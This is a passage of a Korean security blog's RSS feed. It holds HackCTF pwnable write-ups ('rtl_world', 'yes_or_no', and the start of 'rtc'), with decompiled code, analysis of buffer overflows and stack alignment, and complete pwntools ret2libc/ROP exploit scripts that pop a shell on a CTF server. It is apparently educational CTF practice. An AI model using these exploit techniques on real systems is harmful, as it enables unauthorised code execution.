  void *handle; // [esp+98h] [ebp-8h]
  void *s1; // [esp+9Ch] [ebp-4h]

  setvbuf(stdout, 0, 2, 0);
  handle = dlopen(&quot;/lib/i386-linux-gnu/libc.so.6&quot;, 1);
  v6 = dlsym(handle, &quot;system&quot;);
  dlclose(handle);
  for ( s1 = v6; memcmp(s1, &quot;/bin/sh&quot;, 8u); s1 = (char *)s1 + 1 )
    ;
  puts(&quot;\n\nNPC [Village Presient] : &quot;);
  puts(&quot;Binary Boss made our village fall into disuse...&quot;);
  puts(&quot;If you Have System Armor &amp;amp;&amp;amp; Shell Sword.&quot;);
  puts(&quot;You can kill the Binary Boss...&quot;);
  puts(&quot;Help me Pwnable Hero... :(\n&quot;);
  printf(&quot;Your Gold : %d\n&quot;, gold);
  while ( 1 )
  {
    Menu();
    printf(&quot;&amp;gt;&amp;gt;&amp;gt; &quot;);
    __isoc99_scanf(&quot;%d&quot;, &amp;amp;v4);
    switch ( v4 )
    {
      case 0:
        continue;
      case 1:
        system(&quot;clear&quot;);
        puts(&quot;[Binary Boss]\n&quot;);
        puts(&quot;Arch:     i386-32-little&quot;);
        puts(&quot;RELRO:    Partial RELRO&quot;);
        puts(&quot;Stack:    No canary found&quot;);
        puts(&quot;NX:       NX enabled&quot;);
        puts(&quot;PIE:      No PIE (0x8048000)&quot;);
        puts(&quot;ASLR:  Enable&quot;);
        printf(&quot;Binary Boss live in %p\n&quot;, handle);
        puts(&quot;Binart Boss HP is 140 + Armor + 4\n&quot;);
        break;
      case 2:
        Get_Money(gold);
        break;
      case 3:
        if ( gold &amp;lt;= 1999 )
        {
          puts(&quot;You don't have gold... :(&quot;);
        }
        else
        {
          gold -= 1999;
          printf(&quot;System Armor : %p\n&quot;, v6);
        }
        break;
      case 4:
        if ( gold &amp;lt;= 2999 )
        {
          puts(&quot;You don't have gold... :(&quot;);
        }
        else
        {
          gold -= 2999;
          printf(&quot;Shell Sword : %p\n&quot;, s1);
        }
        break;
      case 5:
        printf(&quot;[Attack] &amp;gt; &quot;);
        read(0, &amp;amp;buf, 0x400u);
        return 0;
      case 6:
        puts(&quot;Your Not Hero... Bye...&quot;);
        exit(0);
        return result;
    }
  }
}&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;코드를 확인해보니 사용자로부터 입력 값을 받아서 switch case 문을 통해 각각 정해진 동작을 합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;switch case문을 확인해보니 3을 입력하고 해당 조건을 맞춰주면 /bin/sh 문자열의 주소를 알아낼 수 있고, 4를 입력하고 조건문을 통과하면 system 함수의 주소를 알 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그리고 case 5번에서 buffer oveflow 취약점이 발생하여 rtl 기법을 사용하여 exploit 할 수 있을 것으로 보입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;우선 system 함수의 주소와 /bin/sh 문자열의 주소를 알기 위해선 gold가 5000 정도 있어야 합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;gold는 case 2번에서 Get_Money 함수를 사용하여 얻을 수 있을 것으로 보입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1628508448184&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;int Get_Money()
{
  int result; // eax
  int v1; // [esp+8h] [ebp-Ch]
  int v2; // [esp+Ch] [ebp-8h]
  int v3; // [esp+10h] [ebp-4h]

  puts(&quot;\nThis world is F*cking JabonJui&quot;);
  puts(&quot;1) Farming...&quot;);
  puts(&quot;2) Item selling...&quot;);
  puts(&quot;3) Hunting...&quot;);
  v3 = 0;
  v2 = rand();
  printf(&quot;(Job)&amp;gt;&amp;gt;&amp;gt; &quot;);
  __isoc99_scanf(&quot;%d&quot;, &amp;amp;v1);
  result = v1;
  if ( v1 == 2 )
  {
    puts(&quot;\nItem selling...&quot;);
    while ( v3 &amp;lt;= 350 )
      ++v3;
    puts(&quot;+ 350 Gold&quot;);
    gold += v3;
    result = printf(&quot;\nYour Gold is %d\n&quot;, gold);
  }
  else if ( v1 &amp;gt; 2 )
  {
    if ( v1 == 3 )
    {
      puts(&quot;\nHunting...&quot;);
      while ( v3 &amp;lt;= 500 )
        ++v3;
      puts(&quot;+ 500 Gold&quot;);
      gold += v3;
      result = printf(&quot;\nYour Gold is %d\n&quot;, gold);
    }
    else if ( v1 == 4 )
    {
      puts(&quot;\nWow! you can find Hidden number!&quot;);
      puts(&quot;Life is Just a One Shot...&quot;);
      puts(&quot;Gambling...&quot;);
      printf(&quot;+ %d Gold\n&quot;, v2);
      gold += v2;
      result = printf(&quot;\nYour Gold is %d\n&quot;, gold);
    }
  }
  else if ( v1 == 1 )
  {
    puts(&quot;\nFarming...&quot;);
    while ( v3 &amp;lt;= 100 )
      ++v3;
    puts(&quot;+ 100 Gold&quot;);
    gold += v3;
    result = printf(&quot;\nYour Gold is %d\n&quot;, gold);
  }
  return result;
}&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Get_Money 함수를 확인해보니 사용자로부터 입력값을 받아서 각각 다른 값의 gold를 얻어올 수 있습니다. 이를 활용하여 gold를 획득하고 system 함수의 주소와 /bin/sh 문자열의 주소를 알아내서 exploit 하면 될 것 같습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;exploit code&lt;/h3&gt;
&lt;pre id=&quot;code_1628508672679&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;from pwn import *
context.log_level='DEBUG'

p = remote(&quot;ctf.j0n9hyun.xyz&quot;, 3010)
#p = process(&quot;./rtl_world&quot;)
#gdb.attach(p)

for i in range(8):
    p.recvuntil(&quot;&amp;gt;&amp;gt;&amp;gt;&quot;)
    p.sendline(&quot;2&quot;)
    p.recvuntil(&quot;(Job)&amp;gt;&amp;gt;&amp;gt;&quot;)
    p.sendline(&quot;3&quot;)

p.sendline(&quot;3&quot;)
p.recvuntil(&quot;System Armor : &quot;)
system_addr = int(p.recv(10), 0)
print system_addr
system_addr = p32(system_addr)

p.recvuntil(&quot;&amp;gt;&amp;gt;&amp;gt;&quot;)
p.sendline(&quot;4&quot;)
p.recvuntil(&quot;Shell Sword : &quot;)
binsh_addr = int(p.recv(10), 0)
print binsh_addr
binsh_addr = p32(binsh_addr)


payload = &quot;&quot;
payload += &quot;A&quot; * 0x90
payload += system_addr
payload += &quot;A&quot; * 4
payload += binsh_addr

p.recvuntil(&quot;&amp;gt;&amp;gt;&amp;gt;&quot;)
p.sendline(&quot;5&quot;)
p.recvuntil(&quot;[Attack] &amp;gt; &quot;)
p.sendline(payload)

p.interactive()&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;위 exploit 코드를 사용하여 flag 값을 획득할 수 있었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;906&quot; data-origin-height=&quot;288&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cbnzRy/btrbJcn5yaI/KYbJXh1qXm9VqTlXgxS02k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cbnzRy/btrbJcn5yaI/KYbJXh1qXm9VqTlXgxS02k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cbnzRy/btrbJcn5yaI/KYbJXh1qXm9VqTlXgxS02k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcbnzRy%2FbtrbJcn5yaI%2FKYbJXh1qXm9VqTlXgxS02k%2Fimg.png&quot; data-origin-width=&quot;906&quot; data-origin-height=&quot;288&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;</description>
      <category>hackctf</category>
      <author>zzasgi</author>
      <guid isPermaLink="true">https://zzasgi.tistory.com/18</guid>
      <comments>https://zzasgi.tistory.com/18#entry18comment</comments>
      <pubDate>Mon, 9 Aug 2021 20:32:28 +0900</pubDate>
    </item>
    <item>
      <title>[hackctf] yes_or_no</title>
      <link>https://zzasgi.tistory.com/15</link>
      <description>&lt;h3 data-ke-size=&quot;size23&quot;&gt;문제&lt;/h3&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;892&quot; data-origin-height=&quot;186&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b8TMkh/btraIl8s5Ew/bj6BIuMzJ46necKgCILKtk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b8TMkh/btraIl8s5Ew/bj6BIuMzJ46necKgCILKtk/img.png&quot; data-alt=&quot;문제 바이너리 실행&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b8TMkh/btraIl8s5Ew/bj6BIuMzJ46necKgCILKtk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb8TMkh%2FbtraIl8s5Ew%2Fbj6BIuMzJ46necKgCILKtk%2Fimg.png&quot; data-origin-width=&quot;892&quot; data-origin-height=&quot;186&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;문제 바이너리 실행&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;문제 파일을 다운받아 실행해보니&lt;span&gt;&amp;nbsp;&lt;/span&gt;Show me your number~!&lt;span&gt;&amp;nbsp;&lt;/span&gt;라는 문구를 출력하고 사용자로부터 입력을 받습니다.&lt;/p&gt;
&lt;p id=&quot;f5c7b68e-ffb7-44bf-9ebf-d862e0c08e6a&quot; data-ke-size=&quot;size16&quot;&gt;1234&lt;span&gt;&amp;nbsp;&lt;/span&gt;를 입력하니&lt;span&gt;&amp;nbsp;&lt;/span&gt;All I can say to you is &quot;do_system+1094&quot;&lt;span&gt;&amp;nbsp;&lt;/span&gt;를 출력해주며 종료합니다.&lt;/p&gt;
&lt;p id=&quot;01b47782-21a6-441e-b68d-d75db3dfc93e&quot; data-ke-size=&quot;size16&quot;&gt;아이다를 사용하여 코드를 확인해보겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1627493646619&quot; class=&quot;c++ arduino&quot; data-ke-language=&quot;c++&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // eax
  int v4; // eax
  int v5; // ecx
  int v6; // eax
  int v7; // eax
  char s; // [rsp+Eh] [rbp-12h]
  int v10; // [rsp+18h] [rbp-8h]
  int v11; // [rsp+1Ch] [rbp-4h]

  setvbuf(stdout, 0LL, 2, 0LL);
  v11 = 5;
  puts(&quot;Show me your number~!&quot;);
  fgets(&amp;amp;s, 10, stdin);
  v10 = atoi(&amp;amp;s);
  if ( (v11 - 10) &amp;gt;&amp;gt; 3 &amp;lt; 0 )
  {
    v4 = 0;
  }
  else
  {
    v3 = v11++;
    v4 = v10 - v3;
  }
  if ( v4 == v10 )
  {
    puts(&quot;Sorry. You can't come with us&quot;);
  }
  else
  {
    v5 = 1204 / ++v11;
    v6 = v11++;
    if ( v10 == (v6 * v5) &amp;lt;&amp;lt; (++v11 % 20 + 5) )
    {
      puts(&quot;That's cool. Follow me&quot;);
      gets(&amp;amp;s);
    }
    else
    {
      v7 = v11--;
      if ( v10 == v7 )
      {
        printf(&quot;Why are you here?&quot;);
        return 0;
      }
      puts(&quot;All I can say to you is \&quot;do_system+1094\&quot;.\ngood luck&quot;);
    }
  }
  return 0;
}&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;조건문들을 만족시키면&amp;nbsp;That's cool. Follow me&amp;nbsp;가 출력되고&amp;nbsp;gets&amp;nbsp;함수를 사용하여 사용자로부터 입력을 받습니다. 취약한 함수인&amp;nbsp;gets&amp;nbsp;를 통해서&amp;nbsp;buffer overflow&amp;nbsp;가 가능할 것으로 보입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1124&quot; data-origin-height=&quot;268&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/qarIc/btraLcv8Uys/5hBOZ8slApg4wKs2xA1S70/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/qarIc/btraLcv8Uys/5hBOZ8slApg4wKs2xA1S70/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/qarIc/btraLcv8Uys/5hBOZ8slApg4wKs2xA1S70/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FqarIc%2FbtraLcv8Uys%2F5hBOZ8slApg4wKs2xA1S70%2Fimg.png&quot; data-origin-width=&quot;1124&quot; data-origin-height=&quot;268&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;보호기법으로는&amp;nbsp;NX bits&amp;nbsp;와&amp;nbsp;Partial RELRO&amp;nbsp;가 걸려있는 것으로 확인 됩니다. RTL 기법을 사용하여&amp;nbsp;Exploit&amp;nbsp;을 하면 될 것 같습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;풀이&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;우선 gdb를 사용하여 조건문을 만족시킬 수 있는 입력 값을 찾아보겠습니다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;288&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bmwGdU/btraBuL4nSy/ZemFVByLX14jV9R5yKiyg0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bmwGdU/btraBuL4nSy/ZemFVByLX14jV9R5yKiyg0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bmwGdU/btraBuL4nSy/ZemFVByLX14jV9R5yKiyg0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbmwGdU%2FbtraBuL4nSy%2FZemFVByLX14jV9R5yKiyg0%2Fimg.png&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;288&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;조건문을 통과하여 사용자로부터 입력 값을 받는&amp;nbsp;gets&amp;nbsp;함수 전에 있는 조건문을 확인해보면&amp;nbsp;main+237&amp;nbsp;지점에서&amp;nbsp;eax와&amp;nbsp;[rbp-0x8]&amp;nbsp;을 비교합니다. 이 시점에 브레이크 포인트를 걸어서&amp;nbsp;eax&amp;nbsp;에 있는 값을 확인해보도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;891&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/HUvfg/btraHYkRpOC/XblbZJFLuhpE1AKe2xDbJ0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/HUvfg/btraHYkRpOC/XblbZJFLuhpE1AKe2xDbJ0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/HUvfg/btraHYkRpOC/XblbZJFLuhpE1AKe2xDbJ0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FHUvfg%2FbtraHYkRpOC%2FXblbZJFLuhpE1AKe2xDbJ0%2Fimg.png&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;891&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;rax&lt;span&gt;&amp;nbsp;&lt;/span&gt;레지스터의 값을 확인해보면&lt;span&gt;&amp;nbsp;&lt;/span&gt;0x960000&lt;span&gt;&amp;nbsp;&lt;/span&gt;인걸 확인했습니다.&lt;span&gt;&amp;nbsp;&lt;/span&gt;0x960000&lt;span&gt;&amp;nbsp;&lt;/span&gt;의 10진수인&lt;span&gt;&amp;nbsp;&lt;/span&gt;9830400&lt;span&gt;&amp;nbsp;&lt;/span&gt;을 입력해주면 조건문을 통과할 수 있을 것으로 보입니다. 다음으로&lt;span&gt;&amp;nbsp;&lt;/span&gt;gets&lt;span&gt;&amp;nbsp;&lt;/span&gt;함수를 이용하여&lt;span&gt;&amp;nbsp;&lt;/span&gt;RTL&lt;span&gt;&amp;nbsp;&lt;/span&gt;을 해보도록 하겠습니다.&lt;/p&gt;
&lt;p id=&quot;cd0a5f2b-9ad6-4759-a24e-d11b00104b85&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p id=&quot;9e279248-5d61-4cbb-ad58-0922661fa1aa&quot; data-ke-size=&quot;size16&quot;&gt;libc_base&lt;span&gt;&amp;nbsp;&lt;/span&gt;및&lt;span&gt;&amp;nbsp;&lt;/span&gt;system&lt;span&gt;&amp;nbsp;&lt;/span&gt;함수의 주소,&lt;span&gt;&amp;nbsp;&lt;/span&gt;/bin/sh&lt;span&gt;&amp;nbsp;&lt;/span&gt;문자열의 주소를 구하기 위해서 gdb를 사용하여&lt;span&gt;&amp;nbsp;&lt;/span&gt;함수들의 offset을 구하도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;1319&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/clAoCx/btraBwiPjQg/8B4cdSCiB0D8x6muquVkO1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/clAoCx/btraBwiPjQg/8B4cdSCiB0D8x6muquVkO1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/clAoCx/btraBwiPjQg/8B4cdSCiB0D8x6muquVkO1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FclAoCx%2FbtraBwiPjQg%2F8B4cdSCiB0D8x6muquVkO1%2Fimg.png&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;1319&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;print 명령어를 사용하여 위에서 부터 차례대로&lt;span&gt;&amp;nbsp;&lt;/span&gt;system_offset, gets_offset, binsh_offset&lt;span&gt;&amp;nbsp;&lt;/span&gt;입니다. 이제 exploit 코드를 작성하여&lt;span&gt;&amp;nbsp;&lt;/span&gt;libcbase&lt;span&gt;&amp;nbsp;&lt;/span&gt;주소를 구하고&lt;span&gt;&amp;nbsp;&lt;/span&gt;RTL 기법을 사용하여 exploit 해보도록 하겠습니다.&lt;/p&gt;
&lt;p id=&quot;5e74ed3c-6bc8-4ced-98f6-19293e023bf4&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p id=&quot;75910d5f-8ed2-4621-bcdd-96c8286d8be6&quot; data-ke-size=&quot;size16&quot;&gt;RTL을 하기전에 이 문제에서는&lt;span&gt;&amp;nbsp;&lt;/span&gt;stack alignment&lt;span&gt;&amp;nbsp;&lt;/span&gt;와&lt;span&gt;&amp;nbsp;&lt;/span&gt;MOVAPS&lt;span&gt;&amp;nbsp;&lt;/span&gt;명령어에 대해서 알고 있어야 합니다.&lt;/p&gt;
&lt;p id=&quot;61ea2dc2-a0cc-4905-8440-f5602146f79d&quot; data-ke-size=&quot;size16&quot;&gt;MOVAPS&lt;span&gt;&amp;nbsp;&lt;/span&gt;명령어는&lt;span&gt;&amp;nbsp;&lt;/span&gt;XMM 레지스터끼리 혹은 XMM 레지스터와 메모리&lt;span&gt;&amp;nbsp;&lt;/span&gt;사이에서&lt;span&gt;&amp;nbsp;&lt;/span&gt;double quadword( 16byte )&lt;span&gt;&amp;nbsp;&lt;/span&gt;크기의 데이터를 옮기는 인스트럭션인데, 메모리의 align이 맞지 않으면&lt;span&gt;&amp;nbsp;&lt;/span&gt;general protection( #GP / SIGSEGV ) fault&lt;span&gt;&amp;nbsp;&lt;/span&gt;를 발생시킵니다. 그리고&lt;span&gt;&amp;nbsp;&lt;/span&gt;Ubuntu 18.04부터 이&lt;span&gt;&amp;nbsp;&lt;/span&gt;movaps 인스트럭션이&lt;span&gt;&amp;nbsp;&lt;/span&gt;do_system()을 포함한 여러 멀티미디어 오퍼레이션에 추가되어 exploit을 작성할 때&lt;span&gt;&amp;nbsp;&lt;/span&gt;stack alignment를 신경 써야 합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1276&quot; data-origin-height=&quot;192&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b7wIe9/btraHsmr8zk/rX6ZxliPYzASOS8ILOL90k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b7wIe9/btraHsmr8zk/rX6ZxliPYzASOS8ILOL90k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b7wIe9/btraHsmr8zk/rX6ZxliPYzASOS8ILOL90k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb7wIe9%2FbtraHsmr8zk%2FrX6ZxliPYzASOS8ILOL90k%2Fimg.png&quot; data-origin-width=&quot;1276&quot; data-origin-height=&quot;192&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이 문제의 코드를 보면 All I can say to you is &quot;do_system+1094&quot; 라고 힌트를 줬습니다. gdb 를 사용하여 확인해보면 해당 위치에서 movaps 명령어를 사용하기 때문에 stack alignment 를 맞춰주어 exploit을 해야합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;Exploit Code&lt;/h3&gt;
&lt;pre id=&quot;code_1627494092997&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;from pwn import *

context.log_level='DEBUG'

p = remote(&quot;ctf.j0n9hyun.xyz&quot;, 3009)
#p = process(&quot;./yes_or_no&quot;, env={'LD_PRELOAD':'./libc-2.27.so'})
#gdb.attach(p)


system_offset = 0x4f440
binsh_offset = 0x1b3e9a

puts_plt = p64(0x0000000000400580)
puts_got = p64(0x601018)

gets_plt = p64(0x00000000004005b0)
gets_got = p64(0x601030)
gets_offset = 0x00000000000800b0

popret = p64(0x400883)
ret = p64(0x0040056e)

p.recvuntil(&quot;Show me your number~!\n&quot;)

p.sendline(&quot;9830400&quot;)

p.recvuntil(&quot;That's cool. Follow me\n&quot;)

payload2 = &quot;&quot;
payload2 += &quot;A&quot; * 0x1a
payload2 += popret
payload2 += gets_got
payload2 += puts_plt
payload2 += p64(0x00000000004006c7)

p.sendline(payload2)

gets = p.recv(6)
print gets

gets += &quot;\x00\x00&quot;
libcbase = u64(gets) - gets_offset
print libcbase
system_addr = libcbase + system_offset
print system_addr
binsh = libcbase + binsh_offset

p.recvuntil(&quot;Show me your number~!\n&quot;)

p.sendline(&quot;9830400&quot;)

p.recvuntil(&quot;That's cool. Follow me\n&quot;)

payload = &quot;&quot;
payload += &quot;A&quot; * 0x1a
payload += ret
payload += popret
payload += p64(binsh)
payload += p64(system_addr)

p.sendline(payload)

p.interactive()&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;위 exploit 코드를 사용하여 성공적으로 flag 값을 획득할 수 있었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;알게된 내용&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;MOVAPS&amp;nbsp;명령어와&amp;nbsp;Stack Alignment&amp;nbsp;에 대해서 공부할 수 있었고, pwntools의 gdb attach 기능을 처음 사용하여 동적 디버깅 연습하는 좋은 경험이었습니다. 분석할 때 동적 디버깅의 필요성을 다시 한번 느끼게 되었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;References&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://hackyboiz.github.io/2020/12/06/fabu1ous/x64-stack-alignment/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://hackyboiz.github.io/2020/12/06/fabu1ous/x64-stack-alignment/&lt;/a&gt;&lt;/p&gt;</description>
      <category>hackctf</category>
      <author>zzasgi</author>
      <guid isPermaLink="true">https://zzasgi.tistory.com/15</guid>
      <comments>https://zzasgi.tistory.com/15#entry15comment</comments>
      <pubDate>Thu, 29 Jul 2021 01:10:04 +0900</pubDate>
    </item>
    <item>
      <title>[hackctf] rtc</title>
      <link>https://zzasgi.tistory.com/14</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;이번에는 이전에 dreamhack에서 basic_x64_rop 문제를 풀면서 익혔던 rtc 기법을 복습할겸 hackctf의 rtc 문제를 풀게 되었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1627231205863&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;gdb-peda$ disas
Dump of assembler code for function main:
   0x00000000004005f6 &amp;lt;+0&amp;gt;:	push   rbp
   0x00000000004005f7 &amp;lt;+1&amp;gt;:	mov    rbp,rsp
=&amp;gt; 0x00000000004005fa &amp;lt;+4&amp;gt;:	sub    rsp,0x40
